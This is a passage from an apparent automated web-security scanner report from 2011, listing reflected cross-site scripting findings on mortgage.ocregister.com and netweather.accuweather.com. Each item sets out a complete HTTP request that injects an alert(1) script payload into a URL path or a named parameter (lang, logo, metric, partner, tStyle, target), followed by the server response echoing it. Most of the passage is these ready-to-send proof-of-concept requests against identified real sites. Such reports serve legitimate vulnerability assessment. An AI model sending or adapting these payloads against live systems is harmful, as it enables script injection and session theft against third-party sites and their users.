Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 44146092a8373b49c062f68d9825aa14=1; s_lastvisit=1296750717165; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296972000168%26vn%3D1; s_vnum_m=1298959200170%26vn%3D1; s_cc=true; s_nr=1296750723302; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; AxData=; Axxd=1

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:03:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:03:08 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/ver1.0/Content/dmhotlinks.css92232\"><script>alert(1)</script>8606eb47764feed/" />
...[SNIP]...

4.397. http://mortgage.ocregister.com/wp-content/plugins/democracy/basic.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /wp-content/plugins/democracy/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 766d1"><script>alert(1)</script>8572d6a55e6 was submitted in the REST URL parameter 1. This input was echoed as 766d1\"><script>alert(1)</script>8572d6a55e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /766d1"><script>alert(1)</script>8572d6a55e6/plugins/democracy/basic.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:23 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/766d1\"><script>alert(1)</script>8572d6a55e6/plugins/democracy/basic.cssfeed/" />
...[SNIP]...

4.398. http://mortgage.ocregister.com/wp-content/plugins/democracy/democracy.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /wp-content/plugins/democracy/democracy.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1fb8"><script>alert(1)</script>a22401a108a was submitted in the REST URL parameter 1. This input was echoed as e1fb8\"><script>alert(1)</script>a22401a108a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /e1fb8"><script>alert(1)</script>a22401a108a/plugins/democracy/democracy.js HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:14 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/e1fb8\"><script>alert(1)</script>a22401a108a/plugins/democracy/democracy.jsfeed/" />
...[SNIP]...

4.399. http://mortgage.ocregister.com/wp-content/plugins/democracy/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /wp-content/plugins/democracy/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf114"><script>alert(1)</script>95836e536ce was submitted in the REST URL parameter 1. This input was echoed as cf114\"><script>alert(1)</script>95836e536ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cf114"><script>alert(1)</script>95836e536ce/plugins/democracy/style.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:11 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/cf114\"><script>alert(1)</script>95836e536ce/plugins/democracy/style.cssfeed/" />
...[SNIP]...

4.400. http://mortgage.ocregister.com/wp-content/themes/onSet/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /wp-content/themes/onSet/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62930"><script>alert(1)</script>7b7b2ccc4d6 was submitted in the REST URL parameter 1. This input was echoed as 62930\"><script>alert(1)</script>7b7b2ccc4d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /62930"><script>alert(1)</script>7b7b2ccc4d6/themes/onSet/style.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:34 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/62930\"><script>alert(1)</script>7b7b2ccc4d6/themes/onSet/style.cssfeed/" />
...[SNIP]...

4.401. http://mortgage.ocregister.com/wp-includes/js/swfobject.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /wp-includes/js/swfobject.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce7f3"><script>alert(1)</script>dcab4cc6610 was submitted in the REST URL parameter 1. This input was echoed as ce7f3\"><script>alert(1)</script>dcab4cc6610 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ce7f3"><script>alert(1)</script>dcab4cc6610/js/swfobject.js?ver=2.2 HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:58 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/ce7f3\"><script>alert(1)</script>dcab4cc6610/js/swfobject.js?ver=2.2feed/" />
...[SNIP]...

4.402. http://mortgage.ocregister.com/wp-includes/wlwmanifest.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /wp-includes/wlwmanifest.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f534"><script>alert(1)</script>e883ec4e0ce was submitted in the REST URL parameter 1. This input was echoed as 3f534\"><script>alert(1)</script>e883ec4e0ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3f534"><script>alert(1)</script>e883ec4e0ce/wlwmanifest.xml HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:07:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:07:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/3f534\"><script>alert(1)</script>e883ec4e0ce/wlwmanifest.xmlfeed/" />
...[SNIP]...

4.403. http://mortgage.ocregister.com/xmlrpc.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /xmlrpc.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86904"><script>alert(1)</script>1d2a8825119 was submitted in the REST URL parameter 1. This input was echoed as 86904\"><script>alert(1)</script>1d2a8825119 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xmlrpc.php86904"><script>alert(1)</script>1d2a8825119?rsd HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:07:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:07:42 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62658

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/xmlrpc.php86904\"><script>alert(1)</script>1d2a8825119?rsdfeed/" />
...[SNIP]...

4.404. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dacc4"%3balert(1)//bc4341ec3d3 was submitted in the lang parameter. This input was echoed as dacc4";alert(1)//bc4341ec3d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=engdacc4"%3balert(1)//bc4341ec3d3&size=12&theme=clouds&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:17:56 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n32), ms jfk-agg-n32 ( origin>CONN)
Cache-Control: max-age=3360
Expires: Thu, 03 Feb 2011 17:13:56 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
Type;
return ret;
}


RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=engdacc4";alert(1)//bc4341ec3d3&url=&video=&category=&logo=1&tStyle=normal&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=engdacc4";ale
...[SNIP]...

4.405. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [logo parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the logo request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32db1"%3balert(1)//42b70526543 was submitted in the logo parameter. This input was echoed as 32db1";alert(1)//42b70526543 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=132db1"%3balert(1)//42b70526543&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:16:57 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n38), ms jfk-agg-n38 ( origin>CONN)
Cache-Control: max-age=3420
Expires: Thu, 03 Feb 2011 17:13:57 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=132db1";alert(1)//42b70526543&tStyle=normal&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=132db1";ale
...[SNIP]...

4.406. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [metric parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the metric request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2096f"%3balert(1)//1ba13126b12 was submitted in the metric parameter. This input was echoed as 2096f";alert(1)//1ba13126b12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=02096f"%3balert(1)//1ba13126b12&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:19:10 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n26), ms jfk-agg-n26 ( origin>CONN)
Cache-Control: max-age=3300
Expires: Thu, 03 Feb 2011 17:14:10 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
edAttrs["type"] = mimeType;
return ret;
}


RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=02096f";alert(1)//1ba13126b12&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=02096f";ale
...[SNIP]...

4.407. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [partner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the partner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37e8c"%3balert(1)//8d39e9c745 was submitted in the partner parameter. This input was echoed as 37e8c";alert(1)//8d39e9c745 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather37e8c"%3balert(1)//8d39e9c745&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:16:21 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n26), ms jfk-agg-n26 ( origin>CONN)
Cache-Control: max-age=3060
Expires: Thu, 03 Feb 2011 17:07:21 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3911


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
nversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather37e8c";alert(1)//8d39e9c745&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather37e8c";ale
...[SNIP]...

4.408. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [tStyle parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the tStyle request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2cc6"%3balert(1)//085e153a142 was submitted in the tStyle parameter. This input was echoed as c2cc6";alert(1)//085e153a142 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normalc2cc6"%3balert(1)//085e153a142&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:16:38 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n28), ms jfk-agg-n28 ( origin>CONN)
Cache-Control: max-age=3180
Expires: Thu, 03 Feb 2011 17:09:38 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normalc2cc6";alert(1)//085e153a142&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normalc2cc6";ale
...[SNIP]...

4.409. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4df0b"%3balert(1)//aada13118d6 was submitted in the target parameter. This input was echoed as 4df0b";alert(1)//aada13118d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self4df0b"%3balert(1)//aada13118d6 HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
